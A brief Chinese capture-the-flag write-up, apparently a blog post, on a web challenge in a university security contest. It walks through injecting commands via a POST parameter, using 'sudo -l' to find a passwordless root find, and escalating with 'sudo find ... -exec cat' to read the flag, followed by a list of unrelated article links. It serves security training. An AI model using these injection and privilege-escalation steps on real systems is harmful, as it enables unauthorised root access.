参考:杭州师范大学第四届网络与信息安全竞赛官方
参考知识:find命令提权以及反弹shell复现_find提权_白冷的博客-CSDN博客
打开题目后发现要求我们用post方式传入一个shit
随便传入一个数试一下,发现显示执行这个文件没有找到命令所在的绝对路径
输入 shit=/usr/bin/ls 所以我们使用绝对路径来执行他,并且发现有一些命令不存在
输入 shit=/usr/bin/sudo -l 我们用sudo去查询的时候,发现有一个find命令是在root权限下的无密码执行的
直接find命令执行
#命令解释: 以find 命令 执行命令 。
【webfindme】# find (一个路径或文件必须存在) -exec 执行命令 (结束)\;
输入shit=/usr/bin/sudo find /flag -exec\; 执行成功
输入shit=/usr/bin/sudo find /flag -exec cat /f* \; cat flag即可
- 跟Google 学代码:Web Apps以及WebView究极优化
- 基于 HTML + WebGL 结合 23D 的疫情地图实时大屏 PC 版
- Web标准
- winwebmail因MACFEE发不了外网邮件
- javaWeb截取视频中画面并保存为图片,作为视频封面
- Web自动化之页面元素定位---Xpath
- WebRTC 媒体数据传输控制之平滑发送实现
- opencv基础入门——色彩空间
- java web xss_JavaWeb xss攻击
- java web 沈泽刚_java web编程技术(沈泽刚